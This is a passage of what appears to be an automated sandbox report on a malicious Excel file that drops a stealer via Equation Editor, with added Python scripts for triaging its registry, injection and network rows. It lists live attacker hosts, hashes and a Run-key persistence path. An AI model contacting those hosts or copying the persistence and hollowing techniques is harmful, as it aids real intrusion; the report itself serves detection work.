Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
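
The registry tables above mix one persistence write (the Run value set by igcc.exe) with dozens of Office self-registration rows, and the (data) values are printed as raw hex. The script below is an added example, not the sandbox's own code: it parses rows in the report's own flattened format, decodes the hex values as UTF-16LE, recognises Windows Installer Darwin descriptors, and separates the Run-key write from Office handler registration. REGISTRY_ROWS is copied verbatim from the tables above; the severity labels and the key patterns used to recognise Office registration are assumptions made for triage.

```python
"""Triage the registry rows in this report: separate the one persistence write
from Office's own handler registration, and decode the (data) values.

Added example, not the sandbox's tooling. REGISTRY_ROWS is copied from the
report's own tables; severity labels and Office-key patterns are assumptions.
"""
import re
from pathlib import PureWindowsPath

REGISTRY_ROWS = r"""
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe" C:\Users\Admin\AppData\Roaming\igcc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
"""

# "Set value (kind) <key> = <value> <writing process> N/A"; the value is either
# a quoted string (with \" and \\ escapes) or a bare hex blob for (data).
ROW_RE = re.compile(
    r'^Set value \((?P<kind>str|int|data)\) (?P<key>\\REGISTRY\\.*?) = '
    r'(?P<value>"(?:[^"\\]|\\.)*"|[0-9A-Fa-f]+) (?P<proc>[A-Z]:\\.*?) N/A$'
)
# Darwin descriptor: 20-char product code, feature name, '>', 20-char component code
DARWIN_RE = re.compile(r"^.{20}\w+>.{20}")
RUN_KEY = "\\currentversion\\run\\"
OFFICE_KEYS = ("\\internet explorer\\", "\\software\\classes\\")   # assumed
OFFICE_DIR = "c:\\program files"


def parse_registry_rows(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        if row["kind"] == "data":
            try:  # REG_BINARY shown as hex; Office stores these as UTF-16LE text
                row["decoded"] = bytes.fromhex(row["value"]).decode("utf-16-le").rstrip("\x00")
            except (ValueError, UnicodeDecodeError):
                row["decoded"] = None
        else:  # drop the outer quotes and undo the report's \" and \\ escaping
            row["decoded"] = re.sub(r"\\(.)", r"\1", row["value"][1:-1])
        rows.append(row)
    return rows


def classify(row):
    """Return (category, severity, note) for one registry write."""
    key, proc = row["key"].lower(), row["proc"]
    if RUN_KEY in key:
        target = row["decoded"] or row["value"]
        in_user_dir = "\\appdata\\" in target.lower()
        renamed = PureWindowsPath(target).name.lower() != PureWindowsPath(proc).name.lower()
        note = f"Run value '{row['key'].rsplit(chr(92), 1)[-1]}' -> {target}"
        if renamed:
            note += f"; target does not match the writing binary {PureWindowsPath(proc).name}"
        return ("persistence", "high" if in_user_dir else "medium", note)
    if row["kind"] == "data" and row["decoded"] and DARWIN_RE.match(row["decoded"]):
        return ("office-selfreg", "info",
                "UTF-16LE Windows Installer Darwin descriptor, not a command line: "
                + row["decoded"])
    if any(k in key for k in OFFICE_KEYS) and proc.lower().startswith(OFFICE_DIR):
        return ("office-selfreg", "info",
                f"{PureWindowsPath(proc).name} registering an Office file handler")
    return ("review", "low", f"unclassified write by {PureWindowsPath(proc).name}")


if __name__ == "__main__":
    for row in parse_registry_rows(REGISTRY_ROWS):
        category, severity, note = classify(row)
        print(f"[{severity:6}] {category:15} {note}")
```

Feeding the full tables through this collapses the report to a single high-severity item, the mpTrle Run value, and confirms that the WINWORD.EXE and EXCEL.EXE rows decode to Office's own advertised-component descriptors.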

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\igcc.exe

"C:\Users\Admin\AppData\Roaming\igcc.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Users\Admin\AppData\Roaming\igcc.exe

"C:\Users\Admin\AppData\Roaming\igcc.exe"
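
The WriteProcessMemory and SetThreadContext rows, read together with the process list, describe a three-hop chain: EQNEDT32.EXE writes into igcc.exe, which then hollows a second copy of itself. The script below is an added example, not part of the report: it parses rows in the report's own format, collapses the repeated writes per (writer, target) pair, labels each pair (Equation Editor writing into a user-directory process; same-image write plus thread-context reset as hollowing; 32-bit Office writing into splwow64.exe as expected printing behaviour) and walks the chain from a root PID. MEMORY_EVENTS is copied from the tables above with duplicates dropped; the splwow64.exe allowlist and the labels are assumptions.

```python
"""Reconstruct the injection chain from the report's memory-write and
thread-context rows and label each writer/target pair.

Added example, not part of the sandbox report. MEMORY_EVENTS is copied from
the WriteProcessMemory and SetThreadContext tables (duplicates dropped); the
allowlisted Office->splwow64.exe pair and the labels are assumptions.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

MEMORY_EVENTS = r"""
PID 528 wrote to memory of 1616 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\igcc.exe
PID 2792 wrote to memory of 1496 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1616 wrote to memory of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
PID 1616 set thread context of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe
"""

EVENT_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<action>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) N/A (?P<src_img>[A-Z]:\\.*?) (?P<dst_img>[A-Z]:\\.*)$"
)
SYSTEM_DIRS = ("c:\\program files", "c:\\windows")
# 32-bit Office hands print jobs to the 64-bit spooler proxy; assumed benign.
EXPECTED_PAIRS = {("WINWORD.EXE", "SPLWOW64.EXE"), ("EXCEL.EXE", "SPLWOW64.EXE")}


def parse_events(text):
    matches = (EVENT_RE.match(line.strip()) for line in text.splitlines())
    return [m.groupdict() for m in matches if m]


def triage(events):
    """Collapse events per (writer, target) pair and label the pair."""
    pairs = defaultdict(lambda: {"actions": set()})
    for e in events:
        p = pairs[(int(e["src"]), int(e["dst"]))]
        p["actions"].add("write" if e["action"].startswith("wrote") else "setctx")
        p["src_img"], p["dst_img"] = e["src_img"], e["dst_img"]
    findings = []
    for (src, dst), p in pairs.items():
        s = PureWindowsPath(p["src_img"]).name.upper()
        d = PureWindowsPath(p["dst_img"]).name.upper()
        if (s, d) in EXPECTED_PAIRS:
            label, why = "expected", f"{s} -> {d}: Office printing path"
        elif p["src_img"].lower() == p["dst_img"].lower() and {"write", "setctx"} <= p["actions"]:
            label, why = "hollowing", f"{s} overwrites a fresh copy of itself and resets its thread context"
        elif s == "EQNEDT32.EXE" and not p["dst_img"].lower().startswith(SYSTEM_DIRS):
            label, why = "eqnedt-payload", f"Equation Editor wrote into {p['dst_img']}"
        else:
            label, why = "review", f"{s} -> {d}: {sorted(p['actions'])}"
        findings.append((src, dst, label, why))
    return findings


def injection_chain(events, root_pid):
    """Follow writer->target edges from root_pid; returns [(pid, image name), ...]."""
    images, next_pid = {}, {}
    for e in events:
        src, dst = int(e["src"]), int(e["dst"])
        images[src], images[dst] = e["src_img"], e["dst_img"]
        next_pid.setdefault(src, dst)  # first target is enough for a linear chain
    chain, pid, seen = [], root_pid, set()
    while pid in images and pid not in seen:
        seen.add(pid)
        chain.append((pid, PureWindowsPath(images[pid]).name))
        pid = next_pid.get(pid)
    return chain


if __name__ == "__main__":
    evs = parse_events(MEMORY_EVENTS)
    for src, dst, label, why in triage(evs):
        print(f"{src:>5} -> {dst:<5} {label:15} {why}")
    print(" -> ".join(f"{name}({pid})" for pid, name in injection_chain(evs, 528)))
```

For this sample the chain from PID 528 reads EQNEDT32.EXE(528) -> igcc.exe(1616) -> igcc.exe(800); PID 800 is the process whose memory holds the unpacked stealer.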

Network

Country Destination Domain Proto
US 8.8.8.8:53 ln.run udp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
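
The Network table lists every connection, so the same endpoints repeat and sandbox noise (the resolver, the public-IP check) sits next to the hosts that matter. The script below is an added example, not part of the report: it parses the table in the report's own row format, deduplicates by endpoint with a hit count, and sets aside the resolver and the IP-check service so that what remains is the list to block or hunt on. NETWORK_ROWS is copied from the table above; treating 8.8.8.8 and api.ipify.org as non-attacker endpoints is an assumption.

```python
"""Collapse the report's flattened Network table into deduplicated IOCs.

Added example, not part of the report. NETWORK_ROWS is copied from the table
above; the resolver and IP-check allowlists are assumptions.
"""
from collections import Counter

NETWORK_ROWS = """
US 8.8.8.8:53 ln.run udp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 104.21.90.204:80 ln.run tcp
US 104.21.90.204:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
"""

RESOLVERS = {"8.8.8.8"}               # sandbox DNS, not an IOC (assumed)
IP_CHECK_SERVICES = {"api.ipify.org"}  # legitimate service used for the public-IP lookup


def parse_network_rows(text):
    """Rows are 'Country ip:port Domain Proto'; the Domain column repeats the
    IP when the connection was made to a literal address."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def classify(row):
    if row["ip"] in RESOLVERS and row["port"] == 53:
        return "dns-lookup"
    if row["domain"] in IP_CHECK_SERVICES:
        return "ip-check"
    if row["domain"] == row["ip"]:
        return "direct-to-ip"   # no hostname involved: hard-coded address
    return "named-host"


def extract_iocs(rows):
    """Return {(ip, port, proto, domain): hit count} for endpoints worth blocking."""
    return dict(Counter(
        (r["ip"], r["port"], r["proto"], r["domain"])
        for r in rows if classify(r) in ("direct-to-ip", "named-host")
    ))


def dns_names(rows):
    """Hostnames the sample resolved, in case the IPs have since changed."""
    return sorted({r["domain"] for r in rows if classify(r) == "dns-lookup"})


if __name__ == "__main__":
    rows = parse_network_rows(NETWORK_ROWS)
    for (ip, port, proto, domain), n in sorted(extract_iocs(rows).items()):
        print(f"{ip}:{port}/{proto:4} {domain:20} x{n}")
    print("resolved:", ", ".join(dns_names(rows)))
```

The output separates the direct-to-IP host (107.173.143.28:80, three hits, no DNS name at all) from the named host ln.run on both 80 and 443, which is the distinction that matters when deciding whether to block an address or a name.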

Files

memory/2012-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2012-1-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

memory/2792-19-0x000000002FBA1000-0x000000002FBA2000-memory.dmp

memory/2792-21-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

memory/2792-23-0x0000000002D90000-0x0000000002D92000-memory.dmp

memory/2012-24-0x0000000002290000-0x0000000002292000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{495D51C0-3F24-497D-B478-A8EB5C578F7F}

MD5 2b567edce929eab26e72baf169cd50dc
SHA1 1a61c00bf52f2a93c684bb8207d9ca0e7a8d5639
SHA256 9ba896b7dc782de69a1b21271fb14d1b01e01fce486824d040070d6d72246094
SHA512 00a9ccfafaae8bce535df3f4b040a112d9be73d1bb666b8136b72055efb9746416563a9d3ee885466684a14a8e0b193af0486534d96b6e81003811ef3d7701ee

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BD246926-FDD0-458A-885F-D6D2627DE1BD}.FSD

MD5 d04125be403fa2206e14c56cef568daf
SHA1 5dcbe83d52c716fb87798525090d5253d1b89f05
SHA256 8e7dd6e43648307c0f9a09b093af9b3c944aff444b4aed05895909bb1987396a
SHA512 68fc859914d77f7071a23f386ac2a14a161e5a6288e73830f65411ffc33d61c64c6b441fd8523f0b3caf65e8d905af40c20072c2f1f9be5ee5f03c327746dbe9

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 1722dd4102de94974d390429eb694d5b
SHA1 06babb67464c50f978364258744090b6f2962f3b
SHA256 39c4fdce5202d87d6068234fda1c9d32a7aabb7abc2ef4f89ccc66f5300d2df3
SHA512 f5e7b356f112adc2a882d513984c3d30720c0518bdf1d006adcfcb3cc664a65d79b977fbda19e7e88ab1714b82db49cd5e8b38dc39deeb731a95d1f616475c0d

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 b0ff5893e6983d0d9c3549bf4ff1d079
SHA1 c89dda6d12c5d8f05be16dcf53a320be5ecca9ac
SHA256 52a3a04f243b4326e99d3755fc933043715126794927deb0282a9e5302c32913
SHA512 0715faddeb7ad063ef87fbe2095de290b5a795655f04bc9d107c96198210aaa5d185af7286072eccb4b13477896f79e23d834eb831cb3255b88af122586718de

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1545546F-B18C-448D-ACBC-6FC221455F6F}.FSD

MD5 03a9a2efa5b5ce8171463f03c6ebaafc
SHA1 540fc6cb19037ec8592197c16c51a4312ba69c6f
SHA256 8f13267063fa292ca827fecf49b74998093179fdd4b149b98ec58a6b257d32a3
SHA512 3bcfecb9638c37cb211da16298c3579e3fe7ab5dc823bd52e73e7e59217d479a27e7c506d75205d12454d63a901bfcddde2dca8a1775533f66cc29483179bb6d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\lionsarekingofjunglewhounderstandhowfastweareworkingonthejungleasakinglionsalwaysdoingattitudetounderstandheistheonlykinghave__entireworldkingsofjungle[1].doc

Note: a .doc landing in the WinINet cache (Content.IE5) while only a workbook was opened is the externally linked part that the OpenXML signature refers to, i.e. the second stage; the WINWORD.EXE -Embedding and EQNEDT32.EXE -Embedding processes in the process list are consistent with Office opening it as an embedded document. Pull this file as well as the .xlsx when looking for what triggers Equation Editor.

MD5 b11deda09cc2742d551b0d5dcd354ca0
SHA1 cce43ffeca6770177d14c42d06a820d089da4435
SHA256 df8f8da8b2d5f2bb64c4357fa298f64cd6522896dee8d10cd91616e4aad38cb9
SHA512 2e8ad1081fafdbf33733a14e8bb61e2f0960eee7dae2f0c562b817f2f86e33aa351c73ec6b2c700556b1f33fc4c0f08cd22c259e68a8bf645fa8d758e5485e17

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 33808b23864195394913039831030a10
SHA1 c8e44ead746918ae39d794ce1c643cb7eb1e0276
SHA256 784b66346117dc67b2c5da7657f0db63f00e723ac652bd93ac575cb1110a51d7
SHA512 dcf2f0f7305674719606cfa3f17ec31f62ed753d06e99a8add11fb6be98f5bbb6c892c0a82f1860e1db81fdfd733421b12999c2a1841103779d81f90ff9659af

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 aa08ec878b05196c518d4db7d55e371b
SHA1 349148372278a8cb178f3ecd9fc827797db9ed91
SHA256 7a1ba6bbe0ce1e04178103a593cf3dfd6db1c1acbac1e028544c0848c030df22
SHA512 c2ec69ee95370317b02a79758a80f43c59d896efd3f432916b3d6c9a2af39d528347dd9358950a8100115a3967a8a0d2bdd0c14e121b63798618b8dc5103b201

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 4daa0d525e94a9a50a19601543d904ed
SHA1 bea0e3e7eb78b0f3e2438c2e2652874ddffc417e
SHA256 34daedbb242afe08800f3a239a1ac3ac6551257aa85f38c197e71d640c538ff5
SHA512 89bca009470f998abbcdd43897fb6ceed4b26b458a35be5ee7284437b9453a9b79f371638bc652006a168f87ff3ecd95b11a0b5f62d7f311f1be41243b30754d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f6e37e1973964bfc98b893431ea0a7f4
SHA1 39940d986c5088751465972f8b9510cd9d30e38d
SHA256 cc945ac9f269aa3c46686fc0cd36c0d1608b32da0ff666bb70000f6c8110dd64
SHA512 b795652f7fe3fb3a3b24e43296fa9171ca1839fc73e094445aa72901c8b537c2e052a17955e2906dcf54c57e0e73bf84a893763a2a63026d30c7f41a087db1e1

C:\Users\Admin\AppData\Local\Temp\Cab4BEF.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Roaming\igcc.exe

MD5 968cf2f6dd1e574fbd7a60cb2fd057f5
SHA1 4e6cfcb4e13006a40eabf999d528fbbc3c5b4c82
SHA256 ada7a8238c9d285a764c29de13e82cad1a18ce50a5da9a60742b3bc0d0102d9d
SHA512 dfd77ec6fa6d11c34ec44d39e05f31f54e853bec6839567b7ec5712d6c645a371b94cbd35e0f92c770af504700a0a7677075b5294d75db938ed44d87c32ca49a

memory/1616-124-0x0000000001160000-0x0000000001216000-memory.dmp

memory/1616-126-0x0000000000710000-0x0000000000726000-memory.dmp

memory/2012-127-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

memory/1616-128-0x0000000000770000-0x000000000077E000-memory.dmp

memory/1616-129-0x0000000000780000-0x0000000000790000-memory.dmp

memory/1616-130-0x0000000004BD0000-0x0000000004C52000-memory.dmp

memory/800-131-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-133-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-144-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-142-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-140-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-139-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/800-137-0x0000000000400000-0x0000000000442000-memory.dmp

memory/800-135-0x0000000000400000-0x0000000000442000-memory.dmp

memory/2792-146-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 a41cef8d6f4185e6c94550024d6fdc59
SHA1 9d941a2df12e581f1b07b4a8711164c1b2746458
SHA256 770521e0c997988a77f830082e0bd87fabeebfda26b82575e3c305747b19827b
SHA512 26874a0b009f562dc67f4b170526207078c24b553f13942c7d997b2179579cfdd022d10cd30ee3a3f95bc98e6f129b04cc75682dcf4f43ad1cdc35c15380af78

memory/2792-168-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2792-169-0x0000000072CCD000-0x0000000072CD8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-04 01:36

Reported

2024-06-04 01:38

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
